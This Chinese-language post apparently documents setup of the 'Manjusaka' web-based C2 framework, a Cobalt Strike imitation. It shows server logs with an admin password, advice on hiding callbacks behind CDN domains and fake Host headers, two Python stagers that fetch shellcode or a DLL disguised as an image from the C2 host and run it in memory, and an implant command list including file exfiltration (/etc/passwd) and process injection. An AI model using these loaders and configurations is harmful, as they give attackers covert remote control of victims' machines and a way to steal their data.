一款基于Web仿CobaltStrike C2远控

[root@devops nps]# ./manjusaka[NPS] 2022/09/14 15:57:21 初始用户: manjusaka  密码: ZbFCa2L2LRd5[NPS] 2022/09/14 15:57:21 创建项目: 公共项目 没有归属的npc放在这个项目里面[NPS] 2022/09/14 15:57:21 监听项目路由: VHOS5vqN[NPS] 2022/09/14 15:57:21 NPS监听地址 :3200[NPS] 2022/09/14 15:57:21 NPU后台地址 : manjusaka[NPS] 2022/09/14 15:57:21 NPC监听地址 :801[NPS] 2022/09/14 15:57:21 NPC交互路由 : /:target/favicon.ico[NPS] 2022/09/14 15:57:21 NPC下载路由 : /:target/assert/:sys/bg.jpg[NPS] 2022/09/14 15:57:21 NPC文件路由 : /images/:fid/logo.png

项目名称: 随便写，如：hvv2022回调地址: 外网IP和端口：http://12.34.56.78:8080上线域名: cdn域名，如：http://imagecdn2.alicdn.com 如果没有上cdn则填写和回调地址一样Host头 : cdn上线时所需要的host请求头，如：update.baiduimage.com 默认为上线域名代理地址: NPC上线时如果需要走代理，在这里配置。比如我测试用的clash，代理配置为http://192.168.93.1:7890 详见：https://docs.rs/reqwest/0.11.16/reqwest/struct.Proxy.html

import requestsfrom ctypes import cdllres = requests.get("http://192.168.93.217:801/bq1iFEP2/assert/dll/x64/bg.jpg")with open("a.dll","wb") as f:    f.write(res.content)cdll.LoadLibrary("a.dll").main()

import requestsimport ctypesshellcode = requests.get("http://192.168.93.217:801/bq1iFEP2/assert/bin/x64/bg.jpg").contentrwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)ctypes.windll.kernel32.RtlMoveMemory(rwxpage, shellcode, len(shellcode))handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

help      打印帮助 ps        查看进程 eg: psss        查看网络连接 eg: ssls        枚举文件 eg: ls /cd        切换目录 eg: cd / sh        执行系统命令  eg: sh ps -aux  , sh tasklist  cat       读取文本 cat a.txtscreen    执行截屏 screenwget      下载文件 eg: wget http://192.168.1.1/a.txt <a.txt>    文件名可选 默认当前  put       上传文件 eg: put /etc/passwd                          将passwd文件上传到nps服务器  start     执行插件可执行文件 eg: start name <args>               需要可执行文件在plugins目录下 会自动把插件传到目标机器上面pl        执行插件 eg: pl plugname <plugargs>                   需要插件在plugins目录下 inject    注入进程 eg: inject pid <shellcodeurl>                shellcodeurl可选 默认下载当前shellcode下载链接